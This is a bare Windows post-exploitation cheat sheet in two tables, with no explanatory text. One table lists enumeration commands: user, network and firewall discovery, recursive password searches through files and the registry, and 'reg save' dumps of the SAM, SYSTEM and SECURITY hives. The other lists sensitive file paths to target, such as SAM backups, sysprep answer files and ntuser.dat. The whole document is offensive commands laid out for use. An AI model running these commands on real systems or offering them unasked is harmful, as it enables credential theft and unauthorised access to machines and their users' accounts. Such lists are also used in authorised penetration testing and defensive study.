Command |
---|
hostname |
whoami /all |
systeminfo |
net users |
systeminfo |
ipconfig \all |
tree C:\ /f /a > C:\output_of_tree.txt |
route print |
arp -A |
netstat -bano |
schtasks |
tasklist |
netsh firewall show state |
net user |
net accounts |
dir /s pass == cred == vnc == .config |
findstr /si password *.xml *.ini *.txt |
reg query HKLM /f password /t REG_SZ /s |
reg query HKCU /f password /t REG_SZ /s |
type %WINDIR%\System32\drivers\etc\hosts |
reg save HKLM\Security security.hive |
reg save HKLM\System system.hive |
reg save HKLM\SAM sam.hive |
File |
---|
%SYSTEMDRIVE%\boot.ini |
%WINDIR%\win.ini |
%SYSTEMDRIVE%\pagefile.sys |
%WINDIR%\debug\NetSetup.log |
%WINDIR%\repair\sam |
%WINDIR%\repair\system |
%WINDIR%\repair\software |
%WINDIR%\repair\security |
%WINDIR%\iisX.log |
%WINDIR%\system32\config\AppEvent.Evt |
%WINDIR%\system32\config\SecEvent.Evt |
%WINDIR%\system32\config\default.sav |
%WINDIR%\system32\config\security.sav |
%WINDIR%\system32\config\software.sav |
%WINDIR%\system32\config\system.sav |
%WINDIR%\system32\CCM\logs*.log |
%USERPROFILE%\ntuser.dat |
%WINDIR%\System32\drivers\etc\hosts |
%WINDIR%\system32\sysprep.inf |
%WINDIR%\system32\sysprep\sysprep.xml |